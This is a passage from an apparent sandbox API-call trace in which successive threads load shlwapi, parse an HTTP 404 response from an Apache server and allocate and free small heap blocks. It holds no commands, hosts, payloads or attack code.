Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0263.677] GetProcessHeap () returned 0x6a0000 [0263.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0263.677] GetProcessHeap () returned 0x6a0000 [0263.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0263.677] GetProcessHeap () returned 0x6a0000 [0263.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 441 os_tid = 0x1688 [0263.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.881] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0263.881] GetProcessHeap () returned 0x6a0000 [0263.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0263.881] GetProcessHeap () returned 0x6a0000 [0263.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0263.881] GetProcessHeap () returned 0x6a0000 [0263.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 Thread: id = 442 os_tid = 0x1690 [0264.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.228] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0264.228] GetProcessHeap () returned 0x6a0000 [0264.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0264.228] GetProcessHeap () returned 0x6a0000 [0264.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0264.228] GetProcessHeap () returned 0x6a0000 [0264.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 443 os_tid = 0x1698 [0264.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.518] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0264.518] GetProcessHeap () returned 0x6a0000 [0264.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0264.518] GetProcessHeap () returned 0x6a0000 [0264.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0264.518] GetProcessHeap () returned 0x6a0000 [0264.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 444 os_tid = 0x169c [0264.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.728] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0264.728] GetProcessHeap () returned 0x6a0000 [0264.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0264.728] GetProcessHeap () returned 0x6a0000 [0264.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0264.728] GetProcessHeap () returned 0x6a0000 [0264.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 445 os_tid = 0x16a0 [0265.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.211] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0265.211] GetProcessHeap () returned 0x6a0000 [0265.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0265.211] GetProcessHeap () returned 0x6a0000 [0265.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0265.211] GetProcessHeap () returned 0x6a0000 [0265.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 446 os_tid = 0x16a4 [0265.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.513] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0265.513] GetProcessHeap () returned 0x6a0000 [0265.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0265.513] GetProcessHeap () returned 0x6a0000 [0265.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0265.513] GetProcessHeap () returned 0x6a0000 [0265.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 447 os_tid = 0x16a8 [0265.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.678] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0265.679] GetProcessHeap () returned 0x6a0000 [0265.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0265.679] GetProcessHeap () returned 0x6a0000 [0265.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0265.679] GetProcessHeap () returned 0x6a0000 [0265.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 448 os_tid = 0x16b0 [0265.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0265.882] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0265.882] GetProcessHeap () returned 0x6a0000 [0265.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0265.882] GetProcessHeap () returned 0x6a0000 [0265.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0265.882] GetProcessHeap () returned 0x6a0000 [0265.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 449 os_tid = 0x16b4 [0266.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.093] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0266.093] GetProcessHeap () returned 0x6a0000 [0266.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0266.093] GetProcessHeap () returned 0x6a0000 [0266.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0266.093] GetProcessHeap () returned 0x6a0000 [0266.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 450 os_tid = 0x16b8 [0266.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.303] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0266.304] GetProcessHeap () returned 0x6a0000 [0266.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0266.304] GetProcessHeap () returned 0x6a0000 [0266.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0266.304] GetProcessHeap () returned 0x6a0000 [0266.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 451 os_tid = 0x16bc [0266.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.617] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0266.617] GetProcessHeap () returned 0x6a0000 [0266.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0266.617] GetProcessHeap () returned 0x6a0000 [0266.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0266.617] GetProcessHeap () returned 0x6a0000 [0266.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 452 os_tid = 0x16c0 [0266.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0266.943] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0266.943] GetProcessHeap () returned 0x6a0000 [0266.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0266.943] GetProcessHeap () returned 0x6a0000 [0266.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0266.943] GetProcessHeap () returned 0x6a0000 [0266.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 453 os_tid = 0x16c4 [0267.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.251] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0267.251] GetProcessHeap () returned 0x6a0000 [0267.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0267.251] GetProcessHeap () returned 0x6a0000 [0267.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0267.251] GetProcessHeap () returned 0x6a0000 [0267.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 454 os_tid = 0x16cc [0267.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.510] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0267.510] GetProcessHeap () returned 0x6a0000 [0267.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0267.510] GetProcessHeap () returned 0x6a0000 [0267.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0267.510] GetProcessHeap () returned 0x6a0000 [0267.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 455 os_tid = 0x16d0 [0267.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0267.762] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0267.762] GetProcessHeap () returned 0x6a0000 [0267.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0267.762] GetProcessHeap () returned 0x6a0000 [0267.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0267.762] GetProcessHeap () returned 0x6a0000 [0267.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 456 os_tid = 0x16d4 [0268.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.035] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0268.035] GetProcessHeap () returned 0x6a0000 [0268.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0268.035] GetProcessHeap () returned 0x6a0000 [0268.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0268.035] GetProcessHeap () returned 0x6a0000 [0268.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 457 os_tid = 0x16d8 [0268.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.212] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0268.212] GetProcessHeap () returned 0x6a0000 [0268.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0268.213] GetProcessHeap () returned 0x6a0000 [0268.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0268.213] GetProcessHeap () returned 0x6a0000 [0268.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 458 os_tid = 0x16dc [0268.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.430] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0268.431] GetProcessHeap () returned 0x6a0000 [0268.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0268.431] GetProcessHeap () returned 0x6a0000 [0268.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0268.431] GetProcessHeap () returned 0x6a0000 [0268.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 459 os_tid = 0x16e0 [0268.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.638] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0268.638] GetProcessHeap () returned 0x6a0000 [0268.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0268.638] GetProcessHeap () returned 0x6a0000 [0268.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0268.638] GetProcessHeap () returned 0x6a0000 [0268.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 460 os_tid = 0x16e4 [0268.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.863] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0268.863] GetProcessHeap () returned 0x6a0000 [0268.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0268.863] GetProcessHeap () returned 0x6a0000 [0268.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0268.863] GetProcessHeap () returned 0x6a0000 [0268.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 461 os_tid = 0x16e8 [0269.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.098] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0269.098] GetProcessHeap () returned 0x6a0000 [0269.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0269.098] GetProcessHeap () returned 0x6a0000 [0269.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0269.098] GetProcessHeap () returned 0x6a0000 [0269.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 462 os_tid = 0x16ec [0269.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.338] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0269.338] GetProcessHeap () returned 0x6a0000 [0269.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0269.338] GetProcessHeap () returned 0x6a0000 [0269.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0269.338] GetProcessHeap () returned 0x6a0000 [0269.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 463 os_tid = 0x16f4 [0269.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.554] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0269.554] GetProcessHeap () returned 0x6a0000 [0269.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0269.554] GetProcessHeap () returned 0x6a0000 [0269.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0269.555] GetProcessHeap () returned 0x6a0000 [0269.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 464 os_tid = 0x16f8 [0269.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.853] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0269.853] GetProcessHeap () returned 0x6a0000 [0269.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0269.853] GetProcessHeap () returned 0x6a0000 [0269.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0269.854] GetProcessHeap () returned 0x6a0000 [0269.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 465 os_tid = 0x16fc [0270.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.076] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0270.077] GetProcessHeap () returned 0x6a0000 [0270.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0270.077] GetProcessHeap () returned 0x6a0000 [0270.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0270.077] GetProcessHeap () returned 0x6a0000 [0270.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 466 os_tid = 0x1700 [0270.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.333] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0270.333] GetProcessHeap () returned 0x6a0000 [0270.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0270.333] GetProcessHeap () returned 0x6a0000 [0270.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0270.333] GetProcessHeap () returned 0x6a0000 [0270.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 467 os_tid = 0x1704 [0270.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.510] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0270.510] GetProcessHeap () returned 0x6a0000 [0270.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0270.510] GetProcessHeap () returned 0x6a0000 [0270.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0270.510] GetProcessHeap () returned 0x6a0000 [0270.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 468 os_tid = 0x170c [0270.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.713] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0270.713] GetProcessHeap () returned 0x6a0000 [0270.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0270.713] GetProcessHeap () returned 0x6a0000 [0270.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0270.713] GetProcessHeap () returned 0x6a0000 [0270.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 469 os_tid = 0x1714 [0270.964] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.964] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0270.964] GetProcessHeap () returned 0x6a0000 [0270.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0270.964] GetProcessHeap () returned 0x6a0000 [0270.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0270.964] GetProcessHeap () returned 0x6a0000 [0270.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 470 os_tid = 0x1718 [0271.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.242] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", 